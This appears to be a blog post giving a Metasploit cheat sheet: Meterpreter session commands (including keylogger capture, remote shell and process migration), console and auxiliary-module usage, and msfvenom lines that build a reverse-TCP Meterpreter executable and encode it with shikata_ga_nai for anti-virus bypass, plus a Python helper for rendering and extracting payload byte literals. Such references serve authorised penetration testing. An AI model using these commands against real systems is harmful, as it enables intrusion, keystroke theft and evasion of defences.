Metasploit cheat sheet – Metasploit is an excellent penetration-testing framework that can be used for many different tasks. We have discussed it before in numerous Metasploit-related posts.
In this post we will also look at session-control commands such as Meterpreter's shutdown command.
Metasploit cheat sheet
Networking commands
ipconfig: Show network interface configuration
portfwd: Set up port forwarding through the Meterpreter session
route: View/edit network routing table
Process handling commands
getpid: Display the process ID
getuid: Display the user ID
ps: Display running process
kill: Stop and terminate a process
getprivs: Enable as many privileges as possible for the current process
reg: Access the target machine's registry
shell: Open a shell on the target machine
execute: Run a specified program
migrate: Move to a given destination process ID
Interface / output commands
enumdesktops: Show all available desktops
getdesktop: Display the current desktop
keyscan_start: Start the keylogger on the target machine
keyscan_stop: Stop the keylogger on the target machine
setdesktop: Change the current desktop
keyscan_dump: Dump the keylogger contents
Metasploit cheat sheet
Search for module: search [regex]
Specify an exploit to use: use exploit/[ExploitPath]
Specify a Payload to use: set PAYLOAD [PayloadPath]
Show options for the current module: show options
Set options: set [Option] [Value]
Start exploit: exploit
Useful Auxiliary Modules
# Port scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
# DNS enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
# FTP server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
# Proxy server:
msf > use auxiliary/server/socks4
msf > run
msfvenom commands
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.
msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example:
Reverse Meterpreter payload as an executable, redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format options (specified with -f); run with '--help-formats' to list all available output formats:
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code
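As an added illustration (not msfvenom's own code; the exact line layout of the c, pl and rb literals is an approximation of what the tool prints), the following Python renders a buffer in the raw, c, pl and rb forms listed above and extracts the bytes back out of such a literal, which is the direction an analyst usually needs when a source file containing one turns up during triage:

```python
import re

# Constructed sample buffer for the demo; it is not a real payload.
SAMPLE = bytes(range(0x20, 0x60))

def _string_lines(data: bytes, width: int = 15) -> list:
    """Chunk data into "\\xNN..." string literals, `width` bytes per line."""
    return ['"' + "".join("\\x%02x" % b for b in data[i:i + width]) + '"'
            for i in range(0, len(data), width)]

def render(data: bytes, fmt: str):
    """Render data in one of the string formats msfvenom lists under --help-formats.

    raw: the bytes unchanged; c/pl/rb: a source-code literal (layout approximated).
    exe needs a PE template and is out of scope here.
    """
    if fmt == "raw":
        return data
    lines = _string_lines(data)
    if fmt == "c":
        return "unsigned char buf[] = \n" + "\n".join(lines) + ";\n"
    if fmt == "pl":
        return "my $buf = \n" + " .\n".join(lines) + ";\n"
    if fmt == "rb":
        return "buf = \n" + " +\n".join(lines) + "\n"
    raise ValueError("unsupported format %r (see msfvenom --help-formats)" % fmt)

def extract_bytes(source: str) -> bytes:
    """Recover the raw bytes from a c/pl/rb literal so they can be hashed,
    submitted to a sandbox or disassembled during incident response."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", source))

if __name__ == "__main__":
    for fmt in ("c", "pl", "rb"):
        text = render(SAMPLE, fmt)
        assert extract_bytes(text) == SAMPLE   # round trip is lossless
        print(text)
```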
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example:
Encode a payload 5 times using the shikata_ga_nai encoder and output it as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Meterpreter commands
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Shut down or reboot the target machine
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID
Managing sessions
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]
That’s it. I hope this post was helpful to you. If you have any doubts, you can ask me in the comment section.